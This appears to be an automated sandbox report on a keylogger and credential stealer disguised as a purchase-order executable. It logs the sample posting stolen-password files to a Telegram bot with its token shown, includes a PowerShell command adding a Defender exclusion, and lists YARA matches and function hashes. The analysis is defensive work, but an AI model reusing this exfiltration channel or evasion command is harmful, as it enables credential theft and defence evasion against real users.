2024-12-16 13:16:19 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 39 32 65 33 64 37 63 66 64 66 30 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd92e3d7cfdf0fContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:16:20 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:16:20 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:16:20 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 38 30 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17247,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354980,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49968	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:16:21 UTC	369	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8de0a0b8afb2742 Host: api.telegram.org Content-Length: 581 Connection: Keep-Alive
2024-12-16 13:16:21 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 65 30 61 30 62 38 61 66 62 32 37 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8de0a0b8afb2742Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:16:22 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:16:22 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:16:22 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 38 32 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17249,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354982,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	50136	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:18:14 UTC	369	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8fa8d1df6635287 Host: api.telegram.org Content-Length: 581 Connection: Keep-Alive
2024-12-16 13:18:14 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 66 61 38 64 31 64 66 36 36 33 35 32 38 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8fa8d1df6635287Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:18:15 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:18:14 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:18:15 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 35 30 39 34 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17255,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734355094,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.4	50137	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:18:16 UTC	345	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd1daa2fe4a239 Host: api.telegram.org Content-Length: 581
2024-12-16 13:18:16 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 64 61 61 32 66 65 34 61 32 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd1daa2fe4a239Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:18:17 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:18:16 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:18:17 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 35 30 39 36 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17257,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734355096,"document"

Target ID:	0
Start time:	08:14:05
Start date:	16/12/2024
Path:	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe"
Imagebase:	0x670000
File size:	792'064 bytes
MD5 hash:	4B393B41E5B7BDD02E481816BEC9FF4A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:14:08
Start date:	16/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe"
Imagebase:	0xab0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:14:08
Start date:	16/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:14:10
Start date:	16/12/2024
Path:	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe"
Imagebase:	0x500000
File size:	792'064 bytes
MD5 hash:	4B393B41E5B7BDD02E481816BEC9FF4A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.4168906284.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	13.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	4.2%
Total number of Nodes:	1091
Total number of Limit Nodes:	86

Executed Functions

Function 02B676C8 Relevance: 13.2, Strings: 10, Instructions: 736
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(, xrefs: 02B67B36
), xrefs: 02B67D1B
), xrefs: 02B67E2F
(, xrefs: 02B67B3D
), xrefs: 02B67DD3
), xrefs: 02B67D77
(, xrefs: 02B67F2C
), xrefs: 02B67E91
4'^q, xrefs: 02B676E2
., xrefs: 02B67CA0

Memory Dump Source

Source File: 00000000.00000002.1777362060.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b60000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID: ($($($)$)$)$)$)$.$4'^q
API String ID: 0-3513660345
Opcode ID: 2eb8c22527562f9e4db9c8aa4e0355ad9b229cc4e5c992398ff7e29a48a50744
Instruction ID: 350f91aa56a8589667b1f1b85354be2cf249d8e31e09f6bc9ea5ad11e79eb545
Opcode Fuzzy Hash: 2eb8c22527562f9e4db9c8aa4e0355ad9b229cc4e5c992398ff7e29a48a50744
Instruction Fuzzy Hash: A6621A30A10704CFCB05EF74C898BA9B7B2EF89304F1586A9D9096F365DF75A985CB90

Function 02B676B8 Relevance: 13.2, Strings: 10, Instructions: 675
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(, xrefs: 02B67B36
), xrefs: 02B67D1B
), xrefs: 02B67E2F
(, xrefs: 02B67B3D
), xrefs: 02B67DD3
), xrefs: 02B67D77
(, xrefs: 02B67F2C
), xrefs: 02B67E91
4'^q, xrefs: 02B676E2
., xrefs: 02B67CA0

Memory Dump Source

Source File: 00000000.00000002.1777362060.0000000002B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b60000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID: ($($($)$)$)$)$)$.$4'^q
API String ID: 0-3513660345
Opcode ID: 9168fde8b7e6ee3cd96338383b28e7e6b84e19ab62e3f6248279ad4badbeb999
Instruction ID: 6e49129ac65a925f8bbf97699a6a030c0231db008d75f3cfd8e431eb766dff2b
Opcode Fuzzy Hash: 9168fde8b7e6ee3cd96338383b28e7e6b84e19ab62e3f6248279ad4badbeb999
Instruction Fuzzy Hash: 4D520630A10704CFCB04EF74C998AA9B7B2EF89304F1586A9D9096F365DF75A985CF90

Function 0751A708 Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 554
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCapture.USER32 ref: 0751A85E
GetActiveWindow.USER32 ref: 0751A8D6

Strings

Hbq, xrefs: 0751ABC5
Hbq, xrefs: 0751AC7F

Memory Dump Source

Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: ActiveCaptureWindow
String ID: Hbq$Hbq
API String ID: 2424615356-4258043069
Opcode ID: 7f2450a732ba9e71c0d0e541cd1b6bb07860d7b0c5e03df451d2a2930bf09491
Instruction ID: aea6180632e7c18e6dc4766de19bcd4d1ae07bca2a4bbe9e3bbef55f68bd2441
Opcode Fuzzy Hash: 7f2450a732ba9e71c0d0e541cd1b6bb07860d7b0c5e03df451d2a2930bf09491
Instruction Fuzzy Hash: E0227D70B002098FEB25EBB9C5546AEBBF2BFC8300F248569D109AB395DF349D42DB51

Function 070203C8 Relevance: 6.9, Strings: 5, Instructions: 651
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 07022F5B
Hbq, xrefs: 07022E9D
Hbq, xrefs: 07022E13
Hbq, xrefs: 07022CF9
Hbq, xrefs: 07022D8C

Memory Dump Source

Source File: 00000000.00000002.1787278728.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7020000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID: Hbq$Hbq$Hbq$Hbq$Hbq
API String ID: 0-1677660839
Opcode ID: f787799a486ac940d272cdb371b969fb6935e66ab35ef7c7cae2e2b26ca48a60
Instruction ID: cb1e06fd08da1f486cc11ba1f49ddb0c222bcbd6de0f8028f818846929dba58d
Opcode Fuzzy Hash: f787799a486ac940d272cdb371b969fb6935e66ab35ef7c7cae2e2b26ca48a60
Instruction Fuzzy Hash: 9D427071E002288FDB54DFB9C55079EBBF6BF88300F148669D409AB395DB349946CF91

Function 0C468CB8 Relevance: 5.3, Strings: 4, Instructions: 266
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 0C468E2E
, xrefs: 0C468D54
(bq, xrefs: 0C468E02
(&^q, xrefs: 0C468F89

Memory Dump Source

Source File: 00000000.00000002.1788970055.000000000C460000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c460000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID: $(&^q$(bq$Hbq
API String ID: 0-1723523991
Opcode ID: 9acf003d5c3e79425501b1d58f9dd67d7dabe7041bc439280c3dae43652bf987
Instruction ID: eaef8d929fdb54cc631f0471006509d353db4dbbd076c44bb01f188da8b0b0ba
Opcode Fuzzy Hash: 9acf003d5c3e79425501b1d58f9dd67d7dabe7041bc439280c3dae43652bf987
Instruction Fuzzy Hash: 5C917C70F002199FDB18DF79C844AAFBBF6FB88310F10852AE405EB794DB3499458BA5

Function 0751A6F8 Relevance: 3.3, APIs: 2, Instructions: 315
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCapture.USER32 ref: 0751A85E
GetActiveWindow.USER32 ref: 0751A8D6

Memory Dump Source

Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID: ActiveCaptureWindow
String ID:
API String ID: 2424615356-0
Opcode ID: 93d2cf7845de29d65b0ca095a48c93cc50e2e34ddb181bdc0f468826e07a26e5
Instruction ID: 7192fb96ff04bd00d0a5e3b0b1f5ceae08675e5f19d19c78a92c8b2adb10c0d1
Opcode Fuzzy Hash: 93d2cf7845de29d65b0ca095a48c93cc50e2e34ddb181bdc0f468826e07a26e5
Instruction Fuzzy Hash: 4CD1F9B4E00249CFEB25DFB5C554ADDBBB2BF89301F24826AE505AB261DB749981CF40

Function 0C465EF9 Relevance: 1.8, APIs: 1, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1788970055.000000000C460000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c460000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a338dc434bf61160b33124f93f20a37869088cc0173a02971d46c89215277ea
Instruction ID: 5fddc425e367233d3fcc89971f445d9ccd7aad926ac40e9338c3eb044dd4cd72
Opcode Fuzzy Hash: 8a338dc434bf61160b33124f93f20a37869088cc0173a02971d46c89215277ea
Instruction Fuzzy Hash: 0CD11970A00209CFDB14DFA5C948FEEBBF1BF44305F16856AE405AB769DB70A985CB42

Function 07510040 Relevance: 1.8, Strings: 1, Instructions: 551COMMON

Download Yara Rule

Strings

LR^q, xrefs: 075106B5

Memory Dump Source

Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: daef0db928d699ab9d3b7ffdb81154f34bdea210fd2accf6cbce68544f27bb41
Instruction ID: 2efbf473ea883585c2524dbfd071b9424134e463d5766003fc335c8d4e112d2d
Opcode Fuzzy Hash: daef0db928d699ab9d3b7ffdb81154f34bdea210fd2accf6cbce68544f27bb41
Instruction Fuzzy Hash: 57323874A002198FDB58EB28C9557EEB7F2AF88700F1481A8D50D9B3A5DF349D82CF91

Function 07510D46 Relevance: 1.8, Strings: 1, Instructions: 537COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0751159F

Memory Dump Source

Source File: 00000000.00000002.1787722942.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7510000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: d2a3853059cf5e79c5f6238d49268c2bb68e1e2f3f4d95c336ae54e3c049ff43
Instruction ID: cfa0048911db91a9c62b4132e0a758b96585a5499b87fcb1427c69098ecdc4b7
Opcode Fuzzy Hash: d2a3853059cf5e79c5f6238d49268c2bb68e1e2f3f4d95c336ae54e3c049ff43
Instruction Fuzzy Hash: 6042F874A00218CFCB18DB28C995AE9B7F2FF89701F1541E9D509AB3A5DB31AD81CF91

Function 0B887590 Relevance: 1.7, Strings: 1, Instructions: 438COMMON

Download Yara Rule

Strings

Hbq, xrefs: 0B887612

Memory Dump Source

Source File: 00000000.00000002.1788818288.000000000B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b880000_PO-1124-0018- TTR-ASP1 .jbxd

Similarity

API ID:
String ID: Hbq
API String ID: 0-1245868
Opcode ID: a57306e472711efa27eb3945a1a8988bcd6a7816e985a30c8a76e9debb156793
Instruction ID: f0e3381534112068b6013e78f5e34bf7284974b294a3665ba5bae3771b77c7e0
Opcode Fuzzy Hash: a57306e472711efa27eb3945a1a8988bcd6a7816e985a30c8a76e9debb156793
Instruction Fuzzy Hash: D4E18C357016408FDB25EB79C8507AEB7F6AF89700F24446AD149CB6A1DF39DD02CB92

